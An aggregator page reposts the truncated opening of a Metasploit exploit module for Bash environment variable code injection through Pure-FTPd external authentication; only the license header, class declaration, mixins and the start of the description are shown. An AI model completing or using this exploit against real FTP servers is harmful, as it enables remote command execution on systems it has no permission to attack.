Quantcast
Channel: Il Bloggatore » Environment variable
Viewing all articles
Browse latest Browse all 14

Pure-FTPd External Authentication Bash Environment Variable Code Injection

$
0
0
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager   def initialize(info = {}) super(update_info(info, 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', 'Description' => %q( This module exploits...

Viewing all articles
Browse latest Browse all 14

Trending Articles